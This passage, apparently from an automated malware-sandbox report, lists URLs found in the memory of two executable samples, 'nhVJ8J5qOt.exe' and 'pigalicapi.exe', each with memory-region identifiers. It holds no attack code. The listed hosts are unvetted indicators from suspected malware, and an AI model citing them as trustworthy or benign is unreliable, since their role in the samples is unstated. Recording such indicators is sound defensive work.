t":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"Comsit%20Website","excerpt":"","featuredImage":false}}; equals www.twitter.com (Twitter)
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2.gravatar.com/avatar/8f1795d9778dd5337c87d22e0464e1c3?s=96&amp;d=mm&amp;r=g
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijaco/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijakujaco
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=L
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://erp-companion.com-sit.com/de/user/login
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582969088.0000000005120000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709547478.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:400
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.653416069.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://furec.sakura.ne.jp/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gholographic.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/164.html
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/202.html
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/204.html
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.522200075.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hummer.hu/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.532782472.0000000007D80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, 